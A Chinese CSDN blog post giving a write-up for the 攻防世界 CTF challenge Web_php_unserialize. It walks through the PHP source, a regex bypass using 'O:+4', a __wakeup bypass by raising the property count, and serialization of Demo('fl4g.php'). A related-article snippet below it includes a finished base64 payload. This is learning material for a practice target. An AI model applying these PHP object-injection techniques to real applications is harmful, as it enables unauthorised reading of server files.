CTF笔记 攻防世界Web_php_unserialize

最新推荐文章于 2024-05-09 16:45:41 发布
最新推荐文章于 2024-05-09 16:45:41 发布
阅读量310 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51248658/article/details/127204354
版权

文章目录

前言

做过几次反序列化题目,但都是看wp写出来的,也没有记住,所以记一下笔记。小白理解,有不对的地方,还请大佬们指出。

一、PHP序列化与反序列化

序列化就是将一个对象和其所带的变量和值转换成一组特殊格式的字符串,用于再文件中传输。
反序列化,就是将上述字符串还原的一个方法。

一般利用题目中提供的源码进行编译,得到序列化的结果,通过该结果进行构造payload

二、看题目

1.简单的代码审计

<?php 
class Demo { 
    private $file = 'index.php';#private类,序列化后会变成%00Demo%00file
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { #析构函数,在类实例化结束后调用,销毁这个类
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { #会在反序列化时先调用,将file定义为index.php
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { #get方式请求参数
    $var = base64_decode($_GET['var']); #base64解码
    if (preg_match('/[oc]:\d+:/i', $var)) { #正则匹配o:数字或c:数字,返回stop hacking
        die('stop hacking!'); 
    } else {
        @unserialize($var); #反序列化
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

审完代码,有了思路,要利用反序列化得到flag。
在利用过程中,需要绕过正则匹配,这里可以使用O:+4绕过正则(这里看其他师傅的文章知道的,我觉得+相当于空格,不影响后面反序列化)
之后需要绕过wakeup函数,这里直接改键值可绕过,算是基本操作。

2.对fl4g.php进行实例化

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

$a=new Demo('fl4g.php');
$b=serialize($a);
echo $b;
?>

直接用在线编译器,得到结果

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

这里在线编译器会将private类实例化之后的空格省略,所以在构造payload的时候需要自己加上空格
使用burp进行编码
在这里插入图片描述
这里先在demo前后加上空格,需要注意的是private类实例化出来的应该是%00,并不是空格%20,所以在16进制中再改成%00
在这里插入图片描述
记得前面的绕过姿势,在4前面加上+,键值1改为2,然后进行base64编码,得到最终的payload
在这里插入图片描述
得到flag,提交
在这里插入图片描述

总结

通过代码审计进行利用反序列化漏洞(遇到不懂函数要自己去查),然后需要自己进行实例化得到序列化结果,需要多练。
参考文章:
https://blog.csdn.net/yanbai3/article/details/122300480

JazzYu
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界miss-01,杂项misc太湖杯
11-01
攻防世界miss_01,杂项misc太湖杯。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127630023
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTFWeb和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web题环境,方便复现。Enjoy it.
攻防世界Web_php_unserialize
qq_45955869的博客
05-26 97
提示:攻防世界Web_php_unserialize
网络安全最全ctf-misc 个人笔记(有空闲更新)(1),2024年最新338页网易网络安全面试真题解析火爆全网
最新发布
2401_84252820的博客
05-09 350
(二维码就不放了)可以得到第一个清晰的图片是有5625个像素点,第二张是有625个,说明第一张的图片像素点九个就组成一个,说明第一张图片长宽是第二张的三倍(属性中也可以看出来)第一种方法是根据大佬的思路,把第一个图片以间隔为3读取像素点,第二个图片直接读取像素点,分别转换成2进制,这样两个图片的数据就一样长, 可以全部异或,最后再把得到的数据转成二维码放大三倍就能出真正的二维码,直接扫出flag。除常见的base64外,还有base32,base16,base100等,各自有各自的特点。
攻防世界——Web_php_unserialize
weixin_73942557的博客
10-30 178
访问网页以后首先显示这段源码,分析一下代码结构,包含一个类。里面包含了 三个魔术方法:__construct\__destruct\__wakeup 后面的判断中包含了isset魔术方法 ,base64_decode解密,正则表达式判断。 那么现在来思考如何绕过 1、@unserialize($var); @符号抑制了错误输出,所以无法通过这里进行信息获取 2、当调用这个脚本时会触发__wakeup魔术方法,需要对它进行绕过 那么我们通过改变让这个参数大于后面的index.php文件 $f
攻防世界Web_php_unserialize
m0_74979597的博客
09-21 285
这里为什么过滤的是:‘o:数字’和‘c:数字’呢而且不区分大小写;因为serialize() 的参数为 object , 参数类型有对象 " O " , 序列化字符串的格式为 参数格式:参数名长度 , " O:4 " 字符串会被过滤;对象的属性个数有关,如果序列化后的字符串中表示属性个数的数字与真实属性个数一致,那么i就调用__wakeup()函数 ,不一致就ok了;str_replace('O:4', 'O:+4',$C) 代替函数,冲字符串y中寻找'O:4',并替换;从题目:知道反序列化;
web | CTF攻防世界 Web_php_unserialize
weixin_46301214的博客
02-21 951
变量名:Demofile 变成 \00Demo\00, 字符个数+2就行:s:10:"\00Demo\00file"大概意思应该是当反序列化的 属性变量数 大于 当前类的属性变量数 的时候,就什么安全性因素,就不触发。天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了。【绕过点二】绕过 __wakeup函数,把反序列化中的内容数量,从1改成2即可。多一个+号(具体原理也不清楚,反正当是刷经验了,上古版本的php才有的漏洞)既不简单,也不难,我也学了几天才算比较掌握。
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
CTF.rar_ctf_seed7rj
09-21
CEUCE T FEHRENHET CNVERTER
CTF-web_php_serialize反序列化
Be Smart
02-24 813
一.根据题目猜测和反序列化漏洞有关 1.思路: 进入实验环境后,发现是一段php代码,通过接受get请求方式将提交过来的var的值, 先进行base64解码,再进行正则的判断,如果不匹配成功就会反序列化输入的参数值。 所以这里我们目的就是为了绕过正则表达式,让其反序列化出我们要的fl4g.php,再通过析构函数,高亮出fl4g文件中的内容。 2.步骤: 通过代码中的注释我们发现flag在fl4g.php这个文件里面,所以我们要将其序列化 编写一段代码先实例化我们要序列化的类,这里吧fl4g.php传进去,
攻防世界-Web_php_unserialize
fresh_fistpupiu的博客
02-02 305
构造完毕得到相应的payload:TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==//将对象的属性个数改为大于实际数,substr_replace(字符串,要替换进去的字符,开始位置,替换的字符数目)。如:http://url/index.php/?以GET方式,将payload放在var变量中注入。//在O:4:的4前加个‘+’,绕过字符串检测。//base64编码。
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserializephp反序列化漏洞绕过__wakeup()函数、正则表达式)
Onlyone_1314的博客
11-27 1109
打开题目地址: 这也是一个php反序列化的题目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
XCTF-攻防世界CTF平台-Web类——10、unserialize3(反序列化漏洞绕过__wakeup()函数)
Onlyone_1314的博客
11-21 2391
打开题目地址: 发现是一段残缺的php代码 题目名称unserialize3就是反序列化,要求我们通过反序列化漏洞绕过__wakeup()函数。 相关概念: 序列化:   序列化(Serialization)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。 php的序列化和反序列化   php的序列化和反序列化由serialize()和unserialize()这两个函数来完成。s
PHP反序列化漏洞&网鼎杯ctf实例
weixin_44769042的博客
09-22 1115
漏洞简介 php反序列化漏洞,又叫php对象注入漏洞。 简单来讲,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类中的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。 漏洞形成原因 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。 什么是序.
0ctf_2016_unserialize
qq_53460654的博客
10-20 2896
打开环境 只有个登录框 应该存在源码泄露,直接试试访问www.zip 得到源码 直接自动代码审计 发现有疑似这些漏洞 但是没有找到我们的反序列化,因为题目就是反序列化 然后自己来审计一下 在profile.php中 $profile = unserialize($profile); $phone = $profile['phone']; $email = $profile['email']; $nickname = $profile['nickname']; $photo = base64_encode
攻防世界-web-Web_php_unserialize
mlws1900的博客
07-19 383
获取环境 很明显,看题目就是和php序列化有关的get请求接受一个var值,base64编码解码,而且对’/[oc]:\d+:/i’进行过滤,然后反序列化,到__weakup()函数,并且提示flag就在fl4g.php里面,所以构造payload 构造一下payload 上面为测试,显示空白页面,base64后显示stop hacking ’/[oc]:\d+:/i’并未绕过,看了其他wp,发现只需要在类之前加上+即可 后面的数字自然更改 综合payload就是
0ctf_2016 _Web_unserialize
snowlyzz的博客
09-13 354
代码审计+反序列化
ctf题目Web_php_include
07-28
- *1* [ctf-攻防世界-webWeb_php_include](https://blog.csdn.net/m0_62619559/article/details/121345424)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值